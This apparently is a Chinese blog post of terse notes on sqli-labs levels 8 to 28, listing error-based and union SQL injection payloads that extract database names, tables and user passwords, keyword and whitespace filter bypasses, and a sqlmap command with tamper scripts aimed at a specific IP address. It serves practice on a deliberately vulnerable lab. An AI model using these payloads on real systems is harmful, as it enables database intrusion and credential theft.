首页 > 数据库 >sql-lib8-28

sql-lib8-28

时间:2022-12-12 13:46:46浏览次数:50  
标签:py database 28 updatexml 0x7e lib8 concat sql select

8-22
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or'/
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) or'
'or updatexml(1,concat(0x7e,(select password from users limit 5,1),0x7e),1) or'/
'or updatexml(1,concat(0x7e,(select group_concat(username,;,passsword) from users ),0x7e),1) or'/
' or (updatexml(1,concat(0x7e,(SELECT concat_ws(':',username,password) FROM (SELECT username,password FROM users)text LIMIT 0,1),0x7e),1)) or '

"or updatexml(1,concat(0x7e,(select database()),0x7e),1) or"
23
' and 1=1 or '1'='1
and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1/
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
?id=1'and 1=1; %00
?id=-1' union select 1,2,database(); %00
'|| updatexml(1,concat(0x7e,(select database()),0x7e),1) ||'

或者 oorr 或者 ||替换掉

and 也以用 && aandnd 或者%26%26替换掉

‘#’ 也以用 or ‘1’='1 替换掉

在这里有一个陌生的符号:\s: 是匹配所有空白符,包括换行,\S 非空白符,不包括换行。也就是说在这里我们无法使用空格 ,\s会将其消掉。

%0a可以代替空格,或者使用()将其包起来

'oorr%0aupdatexml(1,concat(0x7e,(select database()),0x7e),1)%0aoorr'

/sqlmap.py -u "http://124.70.71.251:40584/new_list.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3

标签:py,database,28,updatexml,0x7e,lib8,concat,sql,select
From: https://www.cnblogs.com/sjzdest/p/16975825.html

相关文章

  • Python的入门学习Day 28~30——form”夜曲编程“
    Day28inDay29time:2021.8.26.​时间模糊了界限,虽我日渐走远。转眼而过的二十多天,既留下了夏天在沙滩上的足迹,同时也为黄金色的秋日铺上留白的画卷。键盘敲......
  • Android平台GB28181设备接入端预置位查询(PresetQuery)探讨和技术实现
    之前blog介绍了GB28181云台控制(PTZCmd)相关,本文主要是介绍下GB28181预置位查询。预置位这块,在处理带云台的设备非常必要,我们主要是做Android平台的GB28181的设备接入端,也可以......
  • mysql
    mysql基础知识mysql执行过程从上图可以看出,MySQL主要由下面几部分构成:连接器:身份认证和权限相关(登录MySQL的时候)。查询缓存:执行查询语句的时候,会先查询缓存(M......
  • MySQL客户端的进阶操作
    GreatSQL社区原创内容未经授权不得随意使用,转载请联系小编并注明来源。GreatSQL是MySQL的国产分支版本,使用上与MySQL一致。作者:土豆娃娃文章来源:社区投稿引言作为......
  • delphi编写sql脚本文件批量执行程序
    程序使用DelphiXE11.1开发,用到控件UniDac9.1.1,QDAC里面的Qlog组件。程序实现了SQL脚本文件批处理执行应用,运行效果图。  文件.pas代码unitmain;interfaceuses......
  • 阿里云Centos7使用yum安装MySQL5.6的正确姿势
    我们对service和chkconfig两个命令都不陌生,systemctl是管制服务的主要工具,它整合了chkconfig与service功能于一体。systemctlis-enablediptables.servicesystemctlis......
  • wsl下docker的ubuntu20.04环境配置mysql、nginx、编译php、编译swoole
    1、docker的ubuntu镜像不识别命令 apt-getupdate #更新 2、aptinstallvim#安装vim编辑器 !!!!!wsl2不用换源,会导致安装依赖时出现版本不对应的情况!!!!! ......
  • k8s容器内部通过Prometheus Operator部署MySQL Exporter监控k8s集群外部的MySQL
    写在前面在按照下面步骤操作之前,请先确保服务器已经部署k8s,prometheus,prometheusoperator,关于这些环境的部署,可以自行查找相关资料安装部署,本文档便不在此赘述。关于pro......
  • MySQL锁,锁的到底是什么?
    作者:蝉沐风博客站点:​​www.chanmufeng.com​​公众号:蝉沐风的码场MySQL锁系列文章已经鸽了挺久了,最近赶紧挤了挤时间,和大家聊一聊MySQL的锁。只要学计算机,「​​锁​​」永......
  • 当pycharm连接不上mysql时候,如何解决?
    当发现pycharm一直连接不上mysql时候,要考虑几个问题?一、端口是否被占用当我再win10中输入netstat -aon|findstr3306   再去任务管理里面发现,还有有两个mysql......